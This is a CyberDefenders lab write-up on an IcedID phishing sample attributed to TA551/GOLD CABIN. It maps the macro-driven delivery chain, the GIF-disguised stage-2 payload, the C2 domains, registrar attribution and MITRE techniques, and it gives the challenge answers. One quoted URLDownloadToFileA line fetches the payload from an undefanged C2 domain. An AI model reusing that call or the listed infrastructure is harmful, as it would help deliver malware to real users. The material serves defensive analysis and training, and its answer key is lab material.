// CyberDefenders  ·  writeup

IcedID

CyberDefenders VirusTotalAny.runtria.geWHOIS

Overview

Threat intelligence investigation into an IcedID sample distributed via widespread phishing campaigns attributed to TA551 / GOLD CABIN. No live environment — pure IOC analysis using hash lookups across VirusTotal, Any.run, and tria.ge to reconstruct the full delivery chain and map TTPs.

Sample hash: 191eda0c539d284b29efe556abb05cd75a9077a0


Sample Identification

Starting with the SHA1 hash on VirusTotal to establish the file identity.

The sample is a macro-enabled Excel document — the .xlsm extension is a classic IcedID delivery vehicle. Malicious Office macros remain one of the most reliable initial access methods because they abuse legitimate Microsoft functionality.

Filename: document-1982481273.xlsm MITRE: T1566.001 — Phishing: Spearphishing Attachment MITRE: T1204.002 — User Execution: Malicious File


Staged Payload Delivery

IcedID uses a two-stage delivery chain. The Excel macro acts as stage 1 — its sole purpose is to download and execute stage 2. The stage 2 payload is disguised as a GIF file to blend in with normal web traffic and avoid content inspection.

Stage 2 filename: 3003.gif The file is not actually an image — it’s a malicious DLL or loader masquerading as a GIF. Renaming payloads to bypass extension-based filtering is a well-documented IcedID technique.

MITRE: T1027.002 — Obfuscated Files or Information: Software Packing MITRE: T1105 — Ingress Tool Transfer


C2 Infrastructure — Domain Analysis

From the Any.run and tria.ge reports, the macro attempts to download 3003.gif from 5 domains. This redundancy is deliberate — if one domain is taken down or blocked, the malware falls back to the next, ensuring successful payload delivery.

Contacted URLs observed pulling 3003.gif:

URLDetectionsStatus
hxxps[://]columbia[.]aula-web[.]net/ds/3003[.]gif10/97404
hxxps[://]partsapp[.]com[.]br/ds/3003[.]gif10/94—
hxxps[://]metaflip[.]io/ds/3003[.]gif12/97—
hxxp[://]usaaforced[.]fun/ds/3003[.]gif8/95—
hxxps[://]tajushariya[.]com/ds/3003[.]gif10/98—

MITRE: T1071.001 — Application Layer Protocol: Web Protocols MITRE: T1573.002 — Encrypted Channel: Asymmetric Cryptography


Registrar Attribution

WHOIS lookups across the malicious domains reveal a pattern — the threat actor predominantly registered their infrastructure through Namecheap. This is consistent with known TA551 operational behaviour; Namecheap’s relatively low cost and privacy features make it a common choice for threat actor infrastructure.

MITRE: T1583.001 — Acquire Infrastructure: Domains


Threat Actor Attribution — GOLD CABIN / TA551

Historical WHOIS and TTP correlation attributes this campaign to GOLD CABIN (Secureworks naming convention), also tracked as TA551 (Proofpoint). Key indicators:

GOLD CABIN is a financially motivated initial access broker known for high-volume phishing campaigns delivering IcedID, Ursnif, and Qakbot. They typically sell access to downstream ransomware operators.


Execution Function

From the tria.ge PE imports analysis — the macro uses the Windows API function URLDownloadToFileA to fetch the stage 2 payload from the C2 domains.

URLDownloadToFileA is the ANSI variant from urlmon.dll — standard for malware targeting broad Windows environments. It downloads a file from a URL directly to disk, making it ideal for staging payloads without requiring additional tooling.

URLDownloadToFileA(NULL, "https://metaflip.io/ds/3003.gif", "C:\...\3003.gif", 0, NULL)

MITRE: T1105 — Ingress Tool Transfer


IOCs

TypeValue
SHA1 Hash191eda0c539d284b29efe556abb05cd75a9077a0
Filenamedocument-1982481273[.]xlsm
Stage 2 Payload3003[.]gif
C2 Domaincolumbia[.]aula-web[.]net
C2 Domainpartsapp[.]com[.]br
C2 Domainmetaflip[.]io
C2 Domainusaaforced[.]fun
C2 Domaintajushariya[.]com
RegistrarNamecheap
Threat ActorGOLD CABIN / TA551
Execution FunctionURLDownloadToFileA

MITRE ATT&CK

TechniqueIDNotes
Spearphishing AttachmentT1566.001.xlsm delivered via phishing email
User Execution: Malicious FileT1204.002Victim opens Excel and enables macros
Ingress Tool TransferT1105URLDownloadToFileA pulls 3003.gif from C2
Software Packing / ObfuscationT1027.002Payload disguised as GIF file
Application Layer ProtocolT1071.001C2 over HTTPS
Asymmetric CryptographyT1573.002SSL/TLS encrypted C2 comms
Exfil Over Alt ProtocolT1048.002Data exfil via HTTPS
Registry Run KeysT1547.001IcedID persistence mechanism
Browser Session HijackingT1185IcedID web injection for credential harvesting
Acquire Infrastructure: DomainsT1583.001Namecheap-registered C2 domains

Lessons Learned


What is the name of the file associated with the given hash?
Click flag to reveal document-1982481273.xlsm
Can you identify the filename of the **GIF** file that was deployed?
Click to reveal answer3003.gif
How many domains does the malware look to download the additional payload file in **Q2**?
Click flag to reveal 5
From the domains mentioned in **Q3**, a DNS registrar was predominantly used by the threat actor to host their harmful content, enabling the malware's functionality. Can you specify the Registrar INC?
Click to reveal answer namecheap
Could you specify the threat actor linked to the sample provided?
Click flag to reveal GOLD CABIN
In the **Execution** phase, what function does the malware employ to fetch extra payloads onto the system?
Click to reveal answer URLDownloadToFileA